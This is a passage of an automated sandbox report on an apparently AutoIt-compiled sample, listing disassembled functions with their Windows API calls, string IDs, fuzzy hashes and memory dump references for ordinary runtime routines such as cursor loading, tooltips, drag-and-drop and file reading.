                                                                        • Opcode Fuzzy Hash: b72856d468ddc8e3dcec0c68ef36e70cec9c1dd47e6f7143bbaa901d398d90a3
                                                                        • Instruction Fuzzy Hash: 5B514C71900709EFDB209FA9CD89B6EBBF5FF48708F004928E596B66A0C774B944DB10
                                                                        Function 00EC79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00EC79C6
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00EC79D1
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00EC79DC
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00EC79E7
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00EC79F2
                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00EC79FD
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00EC7A08
                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00EC7A13
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00EC7A1E
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00EC7A29
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00EC7A34
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00EC7A3F
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00EC7A4A
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00EC7A55
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00EC7A60
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00EC7A6B
                                                                        • GetCursorInfo.USER32(?), ref: 00EC7A7B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$Info
                                                                        • String ID:
                                                                        • API String ID: 2577412497-0
                                                                        • Opcode ID: 4043bdcf8170b4ffa7c91efcc90bdcb0d8e67f7121faaa4e4bd0a67c27ff019f
                                                                        • Instruction ID: 9fc0b7f4ee2d5ca840f3dcd4e322b954f0a996ff55d0458af31ed5c1f19524f2
                                                                        • Opcode Fuzzy Hash: 4043bdcf8170b4ffa7c91efcc90bdcb0d8e67f7121faaa4e4bd0a67c27ff019f
                                                                        • Instruction Fuzzy Hash: C43129B0D083196ADB109FB68C89D9FBFE8FF04754F50452AE54DF7180DA79A5018F91
                                                                        Function 00E7C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E7C8B7,?,00002000,?,?,00000000,?,00E7419E,?,?,?,00F0DC00), ref: 00E8E984
                                                                          • Part of subcall function 00E7660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E753B1,?,?,00E761FF,?,00000000,00000001,00000000), ref: 00E7662F
                                                                        • __wsplitpath.LIBCMT ref: 00E7C93E
                                                                          • Part of subcall function 00E91DFC: __wsplitpath_helper.LIBCMT ref: 00E91E3C
                                                                        • _wcscpy.LIBCMT ref: 00E7C953
                                                                        • _wcscat.LIBCMT ref: 00E7C968
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00E7C978
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E7CABE
                                                                          • Part of subcall function 00E7B337: _wcscpy.LIBCMT ref: 00E7B36F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                        • API String ID: 2258743419-1018226102
                                                                        • Opcode ID: 8efaf5dbaa684a99fc99afda364678ba436ab9872bc84b0df931163c7cc30f97
                                                                        • Instruction ID: 6dc0f5bd637cdb92c0508b1395dad522642b5286cbc80d302157ae9a99dcd46f
                                                                        • Opcode Fuzzy Hash: 8efaf5dbaa684a99fc99afda364678ba436ab9872bc84b0df931163c7cc30f97
                                                                        • Instruction Fuzzy Hash: A912A0715083459FC724EF24C881AAFBBE9BF89304F10591EF599A32A1DB30DA49DB53
                                                                        Function 00EDCE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EDCEFB
                                                                        • DestroyWindow.USER32(?,?), ref: 00EDCF73
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EDCFF4
                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EDD016
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EDD025
                                                                        • DestroyWindow.USER32(?), ref: 00EDD042
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E70000,00000000), ref: 00EDD075
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EDD094
                                                                        • GetDesktopWindow.USER32 ref: 00EDD0A9
                                                                        • GetWindowRect.USER32(00000000), ref: 00EDD0B0
                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EDD0C2
                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EDD0DA
                                                                          • Part of subcall function 00E8B526: GetWindowLongW.USER32(?,000000EB), ref: 00E8B537
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                        • String ID: 0$tooltips_class32
                                                                        • API String ID: 3877571568-3619404913
                                                                        • Opcode ID: d591a7852caf669ad9292b7ed0be87d71a21c71cd2eec549082d0d594a80d4bc
                                                                        • Instruction ID: 6995cd20a1c5e9dbe0f501e7f2267338bb8455b8bc8195cdf55fbcea4365807b
                                                                        • Opcode Fuzzy Hash: d591a7852caf669ad9292b7ed0be87d71a21c71cd2eec549082d0d594a80d4bc
                                                                        • Instruction Fuzzy Hash: A6719C70148205AFD720CF68CC85FAA7BEAFB88708F14551AF985A73A1D770E946DB12
                                                                        Function 00EDF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00EDF37A
                                                                          • Part of subcall function 00EDD7DE: ClientToScreen.USER32(?,?), ref: 00EDD807
                                                                          • Part of subcall function 00EDD7DE: GetWindowRect.USER32(?,?), ref: 00EDD87D
                                                                          • Part of subcall function 00EDD7DE: PtInRect.USER32(?,?,00EDED5A), ref: 00EDD88D
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EDF3E3
                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EDF3EE
                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EDF411
                                                                        • _wcscat.LIBCMT ref: 00EDF441
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EDF458
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EDF471
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EDF488
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EDF4AA
                                                                        • DragFinish.SHELL32(?), ref: 00EDF4B1
                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EDF59C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 169749273-3440237614
                                                                        • Opcode ID: 88bcbead4493a1939c541aaedf26b7f22b27bdea1eafb3f979d43cd779aee598
                                                                        • Instruction ID: a720745cf8cc8c51b88e446daacdd43d392e827fe047f95142bdb68a9768e6f1
                                                                        • Opcode Fuzzy Hash: 88bcbead4493a1939c541aaedf26b7f22b27bdea1eafb3f979d43cd779aee598
                                                                        • Instruction Fuzzy Hash: 7E614971108300AFC311EF64DC45DABBBE9FF89710F404A1EF699A21A1DB709A0ACB52
                                                                        Function 00EB26BC Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 137windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00EE3973,00000016,0000138C,00000016,?,00000016,00F0DDB4,00000000,?), ref: 00EB26F1
                                                                        • LoadStringW.USER32(00000000,?,00EE3973,00000016), ref: 00EB26FA
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00EE3973,00000016,0000138C,00000016,?,00000016,00F0DDB4,00000000,?,00000016), ref: 00EB271C
                                                                        • LoadStringW.USER32(00000000,?,00EE3973,00000016), ref: 00EB271F
                                                                        • __swprintf.LIBCMT ref: 00EB276F
                                                                        • __swprintf.LIBCMT ref: 00EB2780
                                                                        • _wprintf.LIBCMT ref: 00EB2829
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EB2840
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR$s9
                                                                        • API String ID: 618562835-2846937808
                                                                        • Opcode ID: f8bcc3dc6aa673b090367ccd0d91e7c159ab7b12bdc25d3cbc572455377e7eb0
                                                                        • Instruction ID: 448d836073cf53342fa88370af5d79cdf2b00a901b8e648cbdee42a7e14322dc
                                                                        • Opcode Fuzzy Hash: f8bcc3dc6aa673b090367ccd0d91e7c159ab7b12bdc25d3cbc572455377e7eb0
                                                                        • Instruction Fuzzy Hash: 16417E72800219AACF14FBD0DD82EEFB7BCAF15340F505069B60972092EB74AF09DB61
                                                                        Function 00EBAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 00EBAB3D
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00EBAB46
                                                                        • VariantClear.OLEAUT32(?), ref: 00EBAB52
                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00EBAC40
                                                                        • __swprintf.LIBCMT ref: 00EBAC70
                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00EBAC9C
                                                                        • VariantInit.OLEAUT32(?), ref: 00EBAD4D
                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00EBADDF
                                                                        • VariantClear.OLEAUT32(?), ref: 00EBAE35
                                                                        • VariantClear.OLEAUT32(?), ref: 00EBAE44
                                                                        • VariantInit.OLEAUT32(00000000), ref: 00EBAE80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                        • API String ID: 3730832054-3931177956
                                                                        • Opcode ID: d6e4762b1ddf96cc1bd521e0709e145e9091c6e96d7ce173a06a78fbcf91981f
                                                                        • Instruction ID: 45f8db0e0de222b6efa95d400c2e77bf01b9ea21992a7dbb554a1c592e0fb8a6
                                                                        • Opcode Fuzzy Hash: d6e4762b1ddf96cc1bd521e0709e145e9091c6e96d7ce173a06a78fbcf91981f
                                                                        • Instruction Fuzzy Hash: BCD1BE72604615DBDF209FA9D885BEBF7B6FF04700F189466E429BB181DB70E840DB92
                                                                        Function 00ED716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00ED71FC
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00ED7247
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                        • API String ID: 3974292440-4258414348
                                                                        • Opcode ID: bcdcc4f259bfa571d350e9245b068a2aca0a6cd6b00ee39b48e8ca568e165d1c
                                                                        • Instruction ID: d16c0fafded566d3e4a0887dfe131596c86c2fb7714df133c5ea290ffb5f3dfd
                                                                        • Opcode Fuzzy Hash: bcdcc4f259bfa571d350e9245b068a2aca0a6cd6b00ee39b48e8ca568e165d1c
                                                                        • Instruction Fuzzy Hash: 4C915F702086419FCB05EF10C851A6EB7E1EF95314F10A859F99A7B3A3DB70ED4ADB81
                                                                        Function 00EDE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EDE5AB
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00ED9808,?), ref: 00EDE607
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EDE647
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EDE68C
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EDE6C3
                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00ED9808,?), ref: 00EDE6CF
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EDE6DF
                                                                        • DestroyIcon.USER32(?), ref: 00EDE6EE
                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EDE70B
                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EDE717
                                                                          • Part of subcall function 00E90FA7: __wcsicmp_l.LIBCMT ref: 00E91030
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                        • String ID: .dll$.exe$.icl
                                                                        • API String ID: 1212759294-1154884017
                                                                        • Opcode ID: d1c7d871f4892dbb17579f2e28f7caf2bcbc629fd1e60c00ba35d7e1c5c19aed
                                                                        • Instruction ID: 7fecb9f9aba863632e50d2fb803acb280503fc0297a9338b8f71047c4eb126e5
                                                                        • Opcode Fuzzy Hash: d1c7d871f4892dbb17579f2e28f7caf2bcbc629fd1e60c00ba35d7e1c5c19aed
                                                                        • Instruction Fuzzy Hash: 7361AF71500215FEEB14AF64DC4ABBE7BA8FB18724F105106F925FA2D1EB70E985CB60
                                                                        Function 00EBD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • CharLowerBuffW.USER32(?,?), ref: 00EBD292
                                                                        • GetDriveTypeW.KERNEL32 ref: 00EBD2DF
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EBD327
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EBD35E
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EBD38C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1148790751-4113822522
                                                                        • Opcode ID: 28f143b45f3448783dfaa69b6f3c0ed1598e362ffdbcdb51e7b48c3cb2bd10ec
                                                                        • Instruction ID: 3fabe54d56d4b799fd65794876848c7cab360676a709ee705fbd257c49f3a692
                                                                        • Opcode Fuzzy Hash: 28f143b45f3448783dfaa69b6f3c0ed1598e362ffdbcdb51e7b48c3cb2bd10ec
                                                                        • Instruction Fuzzy Hash: 8E512C715087059FC700EF10D8819AEB7E8EF98758F10986DF89977262DB35EE06CB92
                                                                        Function 00EBD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EBD0D8
                                                                        • __swprintf.LIBCMT ref: 00EBD0FA
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EBD137
                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EBD15C
                                                                        • _memset.LIBCMT ref: 00EBD17B
                                                                        • _wcsncpy.LIBCMT ref: 00EBD1B7
                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EBD1EC
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EBD1F7
                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00EBD200
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EBD20A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 2733774712-3457252023
                                                                        • Opcode ID: 1534a9c1577d97c89a79c9a12991b5c62508ba752cba04fb60dad59e0136c9e5
                                                                        • Instruction ID: dd480d5307a212573729259626b4952ae798e5cfa2603b0e87958f3ada23408b
                                                                        • Opcode Fuzzy Hash: 1534a9c1577d97c89a79c9a12991b5c62508ba752cba04fb60dad59e0136c9e5
                                                                        • Instruction Fuzzy Hash: 96318DB290411AABDB21DFA5DC49FEF77BDEF89704F1040B6F609E2160E77096458B24
                                                                        Function 00EA87CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                        • String ID:
                                                                        • API String ID: 884005220-0
                                                                        • Opcode ID: 8343e768c75d97c8afb902ff04620a683ed306e31ca6b5d84fbe8ca6a136da52
                                                                        • Instruction ID: 3da4f6ac3b51e7635edfe5f11ad49f93b6621482fad0fe932136e4d6f4a3d6bc
                                                                        • Opcode Fuzzy Hash: 8343e768c75d97c8afb902ff04620a683ed306e31ca6b5d84fbe8ca6a136da52
                                                                        • Instruction Fuzzy Hash: 22611132900306AFDB296F24DE417BA77E8EF4A724F602166E845BF180DF38ED40D691
                                                                        Function 00EDE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00EDE754
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00EDE76B
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00EDE776
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EDE783
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EDE78C
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00EDE79B
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EDE7A4
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EDE7AB
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00EDE7BC
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EFD9BC,?), ref: 00EDE7D5
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EDE7E5
                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00EDE809
                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00EDE834
                                                                        • DeleteObject.GDI32(00000000), ref: 00EDE85C
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EDE872
                                                                        Memory Dump Source
